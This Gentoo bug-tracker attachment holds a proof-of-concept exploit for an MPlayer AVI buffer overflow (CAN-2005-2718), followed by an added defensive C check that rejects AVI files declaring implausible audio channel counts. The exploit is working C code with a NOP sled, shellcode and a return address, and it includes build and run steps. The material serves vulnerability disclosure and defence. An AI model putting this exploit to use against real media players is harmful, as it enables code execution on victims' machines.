Gentoo's Bugzilla – Attachment 66878 Details for Bug 103555: media-video/mplayer: buffer overflow (CAN-2005-2718)
poc: mplayer.c (text/plain), 2.44 KB, created by Tavis Ormandy (RETIRED) on 2005-08-25 10:38:12 UTC
>#include <string.h>
>#include <stdio.h>
>#include <stdlib.h>
>#include "avilib.h"
>
>/*
> * quick mplayer poc for bug #103555, avilib comes from transcode.
> *
> * $ tar -zxvf /usr/portage/distfiles/transcode-0.6.14.tar.gz
> * $ cd transcode-0.6.14/avilib/
> * $ gcc /path/to/poc.c avilib.c -I. -I../libxio -o exploit
> * $ ./exploit
> * info: exploit.avi has been created.
> * $ mplayer exploit.avi
> * $ mplayer -vo sdl -really-quiet exploit.avi
> * MPlayer 1.0pre6-3.3.5-20050130 (C) 2000-2004 MPlayer Team
> * CPU: Intel Pentium 4/Xeon/Celeron Foster (Family: 8, Stepping: 9)
> * Detected cache-line size is 64 bytes
> * MMX2 supported but disabled
> * CPUflags: MMX: 1 MMX2: 0 3DNow: 0 3DNow2: 0 SSE: 1 SSE2: 1
> * Compiled for x86 CPU with extensions: MMX SSE SSE2
> *
> * 73 audio & 180 video codecs
> * SDL: Using driver: x11
> * SDL: deactivating XScreensaver/DPMS
> * SDL: X11 Resolution 1280x1024
> * SDL: Using 0x32315659 (Planar YV12) image format
> * SDL: using hardware-surface
> * uid=1000(taviso) gid=100(users) groups=10(wheel),100(users),250(portage)
> *
> * notice crazy number of channels in audio attributes.
> *
> * -taviso@gentoo.org
> */
>
>/* media-video/mplayer-1.0_pre6-r4 on kernel 2.6.7 */
>#define RET_ADDR 0x874ada8
>#define OUTPUT_FILE "exploit.avi"
>#define VBUF_SIZE 8192
>
>/* execve() /bin/id */
>unsigned char shellcode[] =
>"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e"
>"\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3"
>"\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc"
>"\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07"
>"\x9f\xcf\x2d\x8e";
>
>int main(int argc, char **argv)
>{
>    unsigned char abuf[8192], *vbuf;
>    avi_t *avifile;
>    int i, *p;
>
>    /* open output file */
>    avifile = AVI_open_output_file(OUTPUT_FILE);
>
>    /* set attributes */
>    AVI_set_video(avifile, 156, 88, 10.0, "cvid");
>    AVI_set_audio(avifile, 65025, 11025, 8, 1, 0);
>
>    /* prepare and write audio buffer */
>    for (p = (int *)(abuf + 3);
>         (void *)p <= (void *)&abuf[sizeof (abuf) - 1] - sizeof (void *); p++)
>        *p = RET_ADDR;
>    for (i = 0; i < 64; i++)
>        AVI_write_audio(avifile, abuf, sizeof (abuf));
>
>    /* prepare and write video buffer */
>    vbuf = (unsigned char *) malloc (VBUF_SIZE);
>    memset(vbuf, 0x90, VBUF_SIZE);
>    memcpy(vbuf + VBUF_SIZE - sizeof (shellcode), shellcode, sizeof (shellcode));
>    AVI_write_frame(avifile, vbuf, VBUF_SIZE, 0);
>
>    /* write avi header */
>    AVI_close(avifile);
>
>    fprintf(stdout, "info: %s has been created.\n", OUTPUT_FILE);
>    return 0;
>}
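
The PoC's own comment points at the audio attributes: it calls AVI_set_audio with 65025 channels. The following is an added example, not part of the attachment or of MPlayer: a pre-parse check that walks an AVI's RIFF chunks and rejects a file whose audio stream format declares an implausible channel count. The limit of 8, the nesting cap, the function names and the sample bytes are assumptions constructed for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_SANE_CHANNELS 8  /* assumed policy limit, not taken from the page */
#define MAX_DEPTH 8          /* cap LIST nesting so hostile input cannot exhaust the stack */

/* Constructed sample: AVI header only (reduced strh), audio stream declaring 65025 channels. */
const uint8_t constructed_sample[] =
    "RIFF" "\x44\0\0\0" "AVI " "LIST" "\x38\0\0\0" "hdrl" "LIST" "\x2c\0\0\0" "strl"
    "strh" "\x08\0\0\0" "auds" "\0\0\0\0"
    "strf" "\x10\0\0\0" "\x01\0" "\x01\xfe" "\x11\x2b\0\0" "\x11\x2b\0\0" "\x01\0" "\x08\0";

/* Walk the chunks in buf[0..len), tracking the largest nChannels in any audio strf. -1 = malformed. */
static int walk(const uint8_t *buf, size_t len, int depth, int *audio, long *max_ch)
{
    for (size_t off = 0; off + 8 <= len; ) {
        const uint8_t *c = buf + off, *body = c + 8;
        uint32_t sz = c[4] | c[5] << 8 | c[6] << 16 | (uint32_t)c[7] << 24;
        if (sz > len - off - 8) return -1;             /* size field overruns the parent */
        if (!memcmp(c, "RIFF", 4) || !memcmp(c, "LIST", 4)) {
            if (sz < 4 || depth >= MAX_DEPTH) return -1;
            if (walk(body + 4, sz - 4, depth + 1, audio, max_ch) < 0) return -1;
        } else if (!memcmp(c, "strh", 4)) {
            *audio = sz >= 4 && !memcmp(body, "auds", 4); /* stream type for the next strf */
        } else if (!memcmp(c, "strf", 4) && *audio) {
            if (sz < 16) return -1;                    /* too short for a WAVEFORMAT header */
            long ch = body[2] | body[3] << 8;          /* nChannels, little endian */
            if (ch > *max_ch) *max_ch = ch;
        }
        off += 8 + (size_t)sz + (sz & 1);              /* chunks are padded to an even size */
    }
    return 0;
}

/* Returns 1 to reject (malformed, or channel count above the limit), else 0.
 * *max_ch receives the largest declared audio channel count seen. */
int avi_audio_check(const uint8_t *buf, size_t len, long *max_ch)
{
    int audio = 0;
    *max_ch = 0;
    return walk(buf, len, 0, &audio, max_ch) < 0 || *max_ch > MAX_SANE_CHANNELS;
}

int main(void)
{
    long ch;
    int reject = avi_audio_check(constructed_sample, sizeof constructed_sample - 1, &ch);
    printf("max channels=%ld reject=%d\n", ch, reject);
    return 0;
}
```

A check like this belongs in front of the player (mail gateway, upload handler, thumbnailer sandbox); it does not replace updating the vulnerable package.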